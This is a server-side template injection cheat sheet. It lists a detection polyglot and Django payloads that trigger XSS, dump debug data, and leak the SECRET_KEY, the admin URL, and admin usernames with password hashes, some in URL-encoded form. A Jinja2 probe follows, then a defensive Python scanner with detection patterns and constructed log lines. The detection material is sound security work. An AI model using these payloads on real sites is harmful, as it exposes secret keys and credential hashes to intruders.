SSTI

Detection

${{<%[%'"}}%\.

Django template engine

Cross-site scripting:

{{ '<script>alert(3)</script>' }}
{{ '<script>alert(3)</script>' | safe }}

Debug information leak:

{% debug %}

Leaking the app’s SECRET_KEY (assumes CookieStorage is the first message storage backend):

{{ messages.storages.0.signer.key }}

Admin Site URL leak:

{% include 'admin/base.html' %}

Admin username & password hash leak (assumes admin_log records exist):

{% load log %}{% get_admin_log 10 as log %}{% for e in log %} {{e.user.get_username}} : {{e.user.password}}{% endfor %}

Only the username (URL-encoded):

{%25+load+log+%25}{%25+get_admin_log+10+as+log+%25}{%25+for+e+in+log+%25}{{+e.user.username+}}{%25+endfor+%25}

Only the password hash (URL-encoded):

{%25+load+log+%25}{%25+get_admin_log+10+as+log+%25}{%25+for+e+in+log+%25}{{+e.user.password+}}{%25+endfor+%25}

Jinja2

Detection (renders a only if the block is evaluated as a template):

{% if 'chiv' == 'chiv' %} a {% endif %}
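A defender-side check for the payload shapes on this page, written as an added example (not part of the original cheat sheet): it URL-decodes request parameters until stable, flags values carrying two or more of the template delimiters the detection polyglot probes for, and separately flags the Django disclosure tags listed above. The access-log lines, hosts and the /search?q= parameter are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Delimiters probed by the detection polyglot: Django/Jinja2 {{ }} and {% %}, plus ${ } and <% %>.
DELIMS = re.compile(r"\{\{|\}\}|\{%|%\}|\$\{|<%|%>")

# Fragments of the Django information-disclosure payloads listed on this page.
DJANGO_LEAKS = re.compile(
    r"\{%\s*debug\s*%\}|\{%\s*load\s+log\b|get_admin_log|messages\.storages|"
    r"\.signer\.key|\{%\s*include\s+['\"]admin/", re.IGNORECASE)


def normalise(value, rounds=3):
    """URL-decode until stable: the page's payloads arrive with %25 for '%' and '+' for spaces."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value):
    """'django-leak', 'probe' (two or more distinct template delimiters) or 'none'."""
    decoded = normalise(value)
    if DJANGO_LEAKS.search(decoded):
        return "django-leak"
    return "probe" if len(set(DELIMS.findall(decoded))) >= 2 else "none"


def scan_access_log(lines):
    """Return (line_no, parameter, verdict) for query-string values that look like SSTI."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST)\s+(\S+)', line)  # request target of a combined-format line
        for key, val in parse_qsl(urlsplit(m.group(1) if m else "").query):
            verdict = classify(val)  # parse_qsl decodes once; normalise() catches double encoding
            if verdict != "none":
                findings.append((n, key, verdict))
    return findings


# Constructed access-log lines (hypothetical hosts and paths), not from a real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=%24%7B%7B%3C%25%5B%25%27%22%7D%7D%25%5C. HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=%7B%25+debug+%25%7D HTTP/1.1" 500 90',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q={%25+load+log+%25}{%25+get_admin_log+10+as+log+%25} HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG))
```

A single `{{` or `}}` in ordinary text is not reported; the second distinct delimiter (or any of the Django tags) is what turns a value into a finding.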
